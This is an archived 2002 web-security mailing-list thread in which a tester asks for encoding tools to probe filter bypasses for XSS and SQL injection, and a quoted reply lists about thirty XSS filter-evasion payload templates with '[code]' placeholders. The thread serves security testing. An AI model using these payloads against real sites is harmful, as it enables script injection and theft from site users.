WebApp Sec: Re: encoder

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

WebApp Sec mailing list archives

Re: encoder

From: "Kevin Spett" <kspett () spidynamics com>
Date: Thu, 19 Dec 2002 17:42:26 -0500

You can also probably set up one of the many proxy-based tools (Spike,
WebProxy, Achilles, etc) to do regex replacing for it automatically, or hack
it in yourself if you're handy with code.

WebInspect has tools to automatically do this stuff too, if you don't mind a
commercial solution.  (Free trial at http://www.spidynamics.com/)


Kevin Spett
SPI Labs
http://www.spidynamics.com/


----- Original Message -----
From: "N30" <n30_lists () hotmail com>
To: <webappsec () securityfocus com>
Sent: Thursday, December 19, 2002 5:10 PM
Subject: encoder

Hi group,

Any links/resources/scripts to conver ASCII characters to unicode / html
encode /double decode?
Testing web apps for XSS & SQL injections, a lot of times, sites filter

out

<> but forget to filter encoded versions of <>.

Thanks in advance
-N




---- Original Message -----
From: "Tomas" <tomasg () extra lt>
To: <webappsec () securityfocus com>
Sent: Monday, December 16, 2002 3:42 AM
Subject: Re: XSS Strings

Hi.

here are some more examples:

<a href="javas&#99;ript&#35;[code]">
  <div onmouseover="[code]">
  <img src="javascript:[code]">
  <img dynsrc="javascript:[code]"> [IE]
  <input type="image" dynsrc="javascript:[code]"> [IE]
  <bgsound src="javascript:[code]"> [IE]
  &<script>[code]</script>
  &{[code]}; [N4]
  <img src=&{[code]};> [N4]
  <link rel="stylesheet" href="javascript:[code]">
  <iframe src="vbscript:[code]"> [IE]
  <img src="mocha:[code]"> [N4]
  <img src="livescript:[code]"> [N4]
  <a href="about:<s&#99;ript>[code]</script>">
  <meta http-equiv="refresh" content="0;url=javascript:[code]">
  <body onload="[code]">
  <div style="background-image: url(javascript:[code]);">
  <div style="behaviour: url([link to code]);"> [IE]
  <div style="binding: url([link to code]);"> [Mozilla]
  <div style="width: expression([code]);"> [IE]
  <style type="text/javascript">[code]</style> [N4]
  <object classid="clsid:..." codebase="javascript:[code]"> [IE]
  <style><!--</style><script>[code]//--></script>
  <![CDATA[<!--]]><script>[code]//--></script>
  <!-- -- --><script>[code]</script><!-- -- -->
  <<script>[code]</script>
  <img src="blah"onmouseover="[code]">
  <img src="blah>" onmouseover="[code]">
  <xml src="javascript:[code]">
  <xml id="X"><a><b>&lt;script>[code]&lt;/script>;</b></a></xml>
    <div datafld="b" dataformatas="html" datasrc="#X"></div>
  [\xC0][\xBC]script>[code][\xC0][\xBC]/script> [UTF-8; IE, Opera]



Tomas


----- Original Message -----
From: <securityarchitect () hush com>
To: <webappsec () securityfocus com>
Sent: Monday, December 16, 2002 9:54 AM
Subject: XSS Strings

Does anyone have a good list of payloads that will cover the majority

of

the options ?

By Date By Thread

Current thread:

Re: XSS Strings, (continued)
- Re: XSS Strings Martin Eiszner (Dec 16)
- Re: XSS Strings Jeroen Latour (Dec 16)
- RE: XSS Strings Glyn (Dec 16)
- Re: XSS Strings Tomas (Dec 16)
  - encoder N30 (Dec 19)
    - Re: encoder Kevin Spett (Dec 19)